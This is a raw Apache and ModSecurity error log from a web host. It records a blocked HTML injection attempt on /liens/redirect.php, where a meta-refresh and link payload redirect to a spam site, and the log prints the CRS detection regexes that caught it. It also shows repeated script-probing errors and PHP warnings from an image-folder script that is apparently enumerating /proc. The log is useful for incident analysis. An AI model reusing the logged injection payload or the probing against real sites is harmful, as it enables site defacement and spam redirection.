[Tue May 12 04:27:32.750913 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:33.393289 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.393667 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.394947 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.395148 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.395409 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.395775 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
[Tue May 12 04:27:33.396131 2026] [security2:error] [pid 1707624:tid 1707701] [client 194.233.64.127:61705] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFbOxS7i6i_mT2NLqzQAAAFM"]
PHP Warning:  filesize(): stat failed for /proc/47/task/47/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/47/task/47/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/47/task/47/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/47/task/47/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/47/task/47/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/47/task/47/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:27:39.192571 2026] [security2:error] [pid 1730175:tid 1730197] [client 43.155.27.244:54588] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/au-cas-ou-le-corps-exulte/embed/"] [unique_id "agKQG3o6NvB9WXx5V-6ZqAAAARQ"]
[Tue May 12 04:27:55.984514 2026] [security2:error] [pid 1707624:tid 1707705] [client 49.51.183.84:60126] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKQK7OxS7i6i_mT2NLq-QAAAFc"]
[Tue May 12 04:28:03.426412 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:03.548918 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:03.678751 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:03.804493 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:03.926118 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.048212 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.176994 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.306465 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.439354 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.561500 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:04.955214 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:05.320160 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:05.471515 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:05.595128 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:05.717130 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:05.971577 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.111956 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.236854 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.370777 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.614439 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.741054 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.863289 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:06.993065 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:07.628860 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:07.826666 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:07.976606 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.139820 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.264809 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.388365 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.515658 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.646940 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.790349 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:08.912717 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:09.572473 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:09.694571 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:09.833906 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.093536 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.216684 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.482043 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.604067 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.727597 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.855212 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:10.979023 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.101007 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.222964 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.471391 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.615104 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.754480 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:11.877177 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.021660 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.144425 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.270266 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.421257 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.566640 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.708136 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.830213 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:12.952553 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.078778 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.201159 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.324442 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.474865 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.738268 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.870227 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:13.993324 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:14.252211 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:14.374365 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:14.670015 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:15.055720 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:15.195827 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:15.342374 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:15.481832 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:15.940514 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:16.356221 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 20.9.31.235:58693] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:17.312062 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:17.443064 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:17.571693 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:17.966367 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:18.253866 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:18.642063 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:19.156762 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:19.294352 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:19.412493 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:19.529411 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:19.774396 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.037188 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.167619 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.283780 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.399624 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.515724 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.653285 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:20.920443 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:21.038581 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:21.166435 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:21.632576 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:21.779921 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:21.920842 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.039398 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.156571 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.296383 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.455614 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.572619 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.688804 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.832132 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:22.985089 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:23.104221 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/991/task/991/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/991/task/991/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/991/task/991/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/991/task/991/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/991/task/991/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/991/task/991/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:28:23.332868 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:23.472780 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:28:23.588544 2026] [proxy_fcgi:error] [pid 1709071:tid 1709111] [client 20.9.31.235:36883] AH01071: Got error 'Primary script unknown'
